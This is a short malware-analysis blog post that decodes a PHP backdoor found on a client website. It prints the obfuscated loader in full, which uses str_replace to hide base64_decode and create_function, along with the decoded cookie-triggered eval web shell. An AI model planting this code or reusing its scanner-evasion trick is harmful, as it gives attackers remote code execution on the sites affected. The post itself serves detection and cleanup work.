PHP str_replace to hide malware

We found another interesting piece of PHP-based malware on a client site a few days ago:

$exg="JGMnd9J2NvdW50JzskYTnd0kX0ndNPndT0tJRTtpZihyZXNldCgkndYSk9PSdtandCcgJndiYgJGMondJGEpPjM";
$iyo="GxhndY2UndoYXJyYndXkoJy9bndXlndx3PVxzXS8nLndCcvXHMvndJyksIGFyndcmF5KCcnLCcrJyk";
$ts = str_replace("b","","bsbtr_brbepblabcbe");
$fy="sIGpndvaW4oYXJyYXlfc2xpY2UoJndGEndsJGMoJGEpLTndMpKndSkpKTtlYnd2hvICc8LycuJGsnduJz4nO30=";
$sjb="peyRrPSndd1nddGU0bndSc7ZWNobyAnPCcnduJGsundJz4nO2ndV2YWwoYmFzZndTY0X2RlY29kZShwcmVnX3Jlc";
$dzy = $ts("er", "", "erberaersereer6er4er_dereercerodere");
$mc = $ts("y","","ycyryeyaytye_yfyuynctyiyoyn");
$tha = $mc('', $dzy($ts("nd", "", $exg.$sjb.$iyo.$fy))); $tha();

Can you decode and see what it is doing? ..

This piece of code tries to obfuscate all the functions that could be flagged by a scanner using a benign php function called str_replace. This function replaces all instances of a string with a replacement in the subject. So, for example, the next line:

----- $ts = str_replace("b","","bsbtr_brbepblabcbe"); ----- 

Replaces all instances of character \’b\’ with nothing. So from bsbtr_brbepblabcbe we get str_replace. Using the same technique, we have some more functions:

----- $dzy = $ts("er", "", "erberaersereer6er4er_dereercerodere"); //base64_decode $mc = $ts("y","","ycyryeyaytye_yfyuynctyiyoyn"); //create_function ----- 

All this for creating a function and running it in this line:

----- $tha = $mc('', $dzy($ts("nd", "", $exg.$sjb.$iyo.$fy))); $tha(); ----- 

Function code is contained in the next expression:

----- $dzy($ts("nd", "", $exg.$sjb.$iyo.$fy)); ----- 

And the final code is:

$c = "count";
$a = $_COOKIE;
if (reset($a) == 'mh' && $c($a) > 3) {
    $k = 'ute4m';
    echo '<' . $k . '>';
    eval (base64_decode (preg_replace(array(
        '/[^\w=\s]/',
        '/\s/'
    ), array(
        '',
        '+'
    ), join(array_slice($a, $c($a) - 3)))));
    echo '</' . $k . '>';
}

What it does? It uses some simple tricks to edit the contents of the cookie, decode it from base64 and eval (execute) that malicious code.